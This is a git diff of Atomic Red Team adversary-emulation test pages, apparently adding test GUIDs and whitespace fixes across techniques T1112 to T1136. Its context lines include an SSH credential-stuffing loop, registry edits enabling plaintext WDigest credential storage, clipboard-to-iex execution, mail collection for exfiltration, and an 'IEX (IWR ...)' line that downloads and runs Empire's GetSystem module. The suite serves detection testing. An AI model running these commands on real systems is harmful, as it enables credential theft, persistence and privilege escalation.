## Atomic Test #2 - SSH Credential Stuffing From MacOS -Using username,password combination from a password dump to login over SSH. +auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + +Using username,password combination from a password dump to login over SSH. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_host | IP Address / Hostname you want to target. | String | localhost| @@ -101,7 +105,7 @@ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepas ##### Description: Requires SSHPASS ##### Check Prereq Commands: ```bash -if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 186c2deb..119a4d22 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -26,9 +26,11 @@ The Registry of a remote system may be modified to aid in execution of files as
## Atomic Test #1 - Modify Registry of Current User Profile - cmd + +auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 + Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. - **Supported Platforms:** Windows @@ -55,17 +57,19 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd + +auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe + Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe| @@ -90,10 +94,12 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
## Atomic Test #3 - Modify registry to store logon credentials + +auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 + Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. - **Supported Platforms:** Windows @@ -120,19 +126,21 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
## Atomic Test #4 - Add domain to Trusted sites Zone + +auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57 + Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bad_domain | Domain to add to trusted site zone | String | bad-domain.com| @@ -163,9 +171,11 @@ Remove-item $key -Recurse -ErrorAction Ignore
## Atomic Test #5 - Javascript in registry + +auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae + Upon execution, a javascript block will be placed in the registry for persistence. Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. - **Supported Platforms:** Windows @@ -192,16 +202,18 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
## Atomic Test #6 - Change Powershell Execution Policy to Bypass + +auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245 + Attackers need to change the powershell execution policy in order to run their malicious powershell scripts. They can either specify it during the execution of the powershell script or change the registry value for it. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | default_execution_policy | Specify the default poweshell execution policy | String | Default| diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 20adce62..a2cd69a4 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -19,15 +19,17 @@
## Atomic Test #1 - Screencapture -Use screencapture command to collect a full desktop screenshot +auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac + +Use screencapture command to collect a full desktop screenshot **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.png| @@ -52,15 +54,17 @@ rm #{output_file}
## Atomic Test #2 - Screencapture (silent) -Use screencapture command to collect a full desktop screenshot +auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 + +Use screencapture command to collect a full desktop screenshot **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.png| @@ -85,15 +89,17 @@ rm #{output_file}
## Atomic Test #3 - X Windows Capture -Use xwd command to collect a full desktop screenshot and review file with xwud +auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac + +Use xwd command to collect a full desktop screenshot and review file with xwud **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.xwd| | package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps| @@ -119,7 +125,7 @@ rm #{output_file} ##### Description: Package with XWD and XWUD must exist on device ##### Check Prereq Commands: ```bash -if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash @@ -133,15 +139,17 @@ sudo #{package_installer}
## Atomic Test #4 - Capture Linux Desktop using Import Tool -Use import command from ImageMagick to collect a full desktop screenshot +auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 + +Use import command from ImageMagick to collect a full desktop screenshot **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.png| @@ -164,7 +172,7 @@ rm #{output_file} ##### Description: ImageMagick must be installed ##### Check Prereq Commands: ```bash -if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi +if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash @@ -178,15 +186,17 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
## Atomic Test #5 - Windows Screencapture -Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour +auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 + +Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | c:\temp\T1113_desktop.zip| | recording_time | Time to take screenshots | String | 5| diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md index 6e5aa9a7..55f5e0c4 100644 --- a/atomics/T1114.001/T1114.001.md +++ b/atomics/T1114.001/T1114.001.md @@ -12,18 +12,20 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox + +auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb + Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. Note: Outlook is required, but no email account necessary to produce artifacts. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | String | $env:TEMP\mail.csv| | file_path | File path for Get-Inbox.ps1 | String | PathToAtomicsFolder\T1114.001\src| @@ -47,7 +49,7 @@ Remove-Item #{output_file} -Force -ErrorAction Ignore ##### Description: Get-Inbox.ps1 must be located at #{file_path} ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} +if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index cc5c2a7a..4967809c 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -18,8 +18,10 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
## Atomic Test #1 - Utilize Clipboard to store or execute commands from -Add data to clipboard to copy off or execute commands from. +auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 + +Add data to clipboard to copy off or execute commands from. **Supported Platforms:** Windows @@ -48,8 +50,10 @@ del %temp%\T1115.txt >nul 2>&1
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell -Utilize PowerShell to echo a command to clipboard and execute it +auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 + +Utilize PowerShell to echo a command to clipboard and execute it **Supported Platforms:** Windows @@ -73,8 +77,10 @@ Get-Clipboard | iex
## Atomic Test #3 - Execute commands from clipboard -Echo a command to clipboard and execute it +auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff + +Echo a command to clipboard and execute it **Supported Platforms:** macOS @@ -98,15 +104,17 @@ $(pbpaste)
## Atomic Test #4 - Collect Clipboard Data via VBA -This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt +auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 + +This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -137,7 +145,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md index ac5f303f..90f0a4d8 100644 --- a/atomics/T1119/T1119.md +++ b/atomics/T1119/T1119.md @@ -18,9 +18,11 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt + +auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b + Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected. - **Supported Platforms:** Windows @@ -49,9 +51,11 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
## Atomic Test #2 - Automated Collection PowerShell + +auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 + Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection to see what was collected. - **Supported Platforms:** Windows @@ -79,9 +83,11 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
## Atomic Test #3 - Recon information for export with PowerShell + +auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 + collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. - **Supported Platforms:** Windows @@ -112,9 +118,11 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt + +auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 + collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. - **Supported Platforms:** Windows diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md index 4a4a879a..a1d5580a 100644 --- a/atomics/T1120/T1120.md +++ b/atomics/T1120/T1120.md @@ -10,8 +10,10 @@
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory -Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity +auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 + +Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity **Supported Platforms:** Windows diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md index 89a3dc0d..ea593f6a 100644 --- a/atomics/T1123/T1123.md +++ b/atomics/T1123/T1123.md @@ -12,8 +12,10 @@ Malware or scripts may be used to interact with the devices through an available
## Atomic Test #1 - using device audio capture commandlet -[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) +auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 + +[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) **Supported Platforms:** Windows diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index f9a8e3d2..13cc9567 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -16,15 +16,17 @@ This information could be useful for performing other techniques, such as execut
## Atomic Test #1 - System Time Discovery -Identify the system time. Upon execution, the local computer system time and timezone will be displayed. +auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20 + +Identify the system time. Upon execution, the local computer system time and timezone will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | computer name to query | string | localhost| @@ -46,8 +48,10 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell -Identify the system time via PowerShell. Upon execution, the system time will be displayed. +auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877 + +Identify the system time via PowerShell. Upon execution, the system time will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 26dad271..750799b6 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -14,15 +14,17 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#) -Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. +auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 + +Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\T1127.001.csproj| | msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319| @@ -43,7 +45,7 @@ Executes the code in a project file using msbuild.exe. The default C# project ex ##### Description: Project file must exist on disk at specified location (#{filename}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{filename}) {exit 0} else {exit 1} +if (Test-Path #{filename}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -58,15 +60,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB) -Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. +auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 + +Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\vb.xml| | msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319| @@ -87,7 +91,7 @@ Executes the code in a project file using msbuild.exe. The default Visual Basic ##### Description: Project file must exist on disk at specified location (#{filename}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{filename}) {exit 0} else {exit 1} +if (Test-Path #{filename}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md index 0fcad8c1..d0c7e284 100644 --- a/atomics/T1132.001/T1132.001.md +++ b/atomics/T1132.001/T1132.001.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Base64 Encoded data. -Utilizing a common technique for posting base64 encoded data. +auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 + +Utilizing a common technique for posting base64 encoded data. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_url | Destination URL to post encoded data. | string | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=| diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md index 5a22a3b7..8129da91 100644 --- a/atomics/T1133/T1133.md +++ b/atomics/T1133/T1133.md @@ -14,15 +14,17 @@ Access may also be gained through an exposed service that doesn’t require auth
## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension -Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list +auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + +Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe| | extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"| @@ -54,7 +56,7 @@ Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extensio ##### Description: Chrome must be installed ##### Check Prereq Commands: ```powershell -if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} +if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md index 031d8e3a..1a8ba916 100644 --- a/atomics/T1134.001/T1134.001.md +++ b/atomics/T1134.001/T1134.001.md @@ -14,11 +14,13 @@ An adversary may do this when they have a specific, existing process they want t
## Atomic Test #1 - Named pipe client impersonation + +auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ - **Supported Platforms:** Windows @@ -42,9 +44,11 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f
## Atomic Test #2 - `SeDebugPrivilege` token duplication + +auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). - **Supported Platforms:** Windows diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 56fae58f..93157b9e 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -22,19 +22,21 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
## Atomic Test #1 - Parent PID Spoofing using PowerShell + +auto_generated_guid: 069258f4-2162-46e9-9a25-c9c6c56150d2 + This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and calc.exe will be launched. Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_process_name | Name of the parent process | string | explorer| | spawnto_process_path | Path of the process to spawn | path | C:\Program Files\Internet Explorer\iexplore.exe| @@ -64,7 +66,7 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore ##### Description: DLL to inject must exist on disk at specified location (#{dll_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_path}) {exit 0} else {exit 1} +if (Test-Path #{dll_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -79,15 +81,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process -Spawns a powershell.exe process as a child of the current process. +auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + +Spawns a powershell.exe process as a child of the current process. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| | parent_pid | PID of process to spawn from | string | $PID| @@ -110,7 +114,7 @@ Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{comma ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -124,15 +128,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process -Spawns a notepad.exe process as a child of the current process. +auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + +Spawns a notepad.exe process as a child of the current process. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_pid | PID of process to spawn from | string | $PID| | test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123| @@ -154,7 +160,7 @@ Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_gu ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -168,15 +174,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe -Spawnd a process as a child of the first accessible svchost.exe process. +auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + +Spawnd a process as a child of the first accessible svchost.exe process. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line | Specified command line to use | string | -Command Start-Sleep 10| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| @@ -198,7 +206,7 @@ Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -212,15 +220,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process -Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. +auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + +Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line | Specified command line to use | string | -Command Start-Sleep 10| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| @@ -243,7 +253,7 @@ Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecific ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 102c0d90..1bd8f520 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -22,15 +22,17 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
## Atomic Test #1 - Network Share Discovery -Network Share Discovery +auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 + +Network Share Discovery **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1| @@ -53,15 +55,17 @@ showmount #{computer_name}
## Atomic Test #2 - Network Share Discovery - linux -Network Share Discovery using smbstatus +auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae + +Network Share Discovery using smbstatus **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba| | package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| @@ -81,7 +85,7 @@ smbstatus --shares ##### Description: Package with smbstatus (samba) must exist on device ##### Check Prereq Commands: ```bash -if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash @@ -95,16 +99,18 @@ sudo #{package_installer}
## Atomic Test #3 - Network Share Discovery command prompt + +auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb + Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | localhost| @@ -125,9 +131,11 @@ net view \\#{computer_name}
## Atomic Test #4 - Network Share Discovery PowerShell + +auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb + Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session - **Supported Platforms:** Windows @@ -150,8 +158,10 @@ get-smbshare
## Atomic Test #5 - View available share drives -View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session +auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae + +View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session **Supported Platforms:** Windows @@ -174,8 +184,10 @@ net share
## Atomic Test #6 - Share Discovery with PowerView -Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. +auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd + +Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md index ed13f916..5a814eb8 100644 --- a/atomics/T1136.001/T1136.001.md +++ b/atomics/T1136.001/T1136.001.md @@ -22,15 +22,17 @@ Such accounts may be used to establish secondary credentialed access that do not
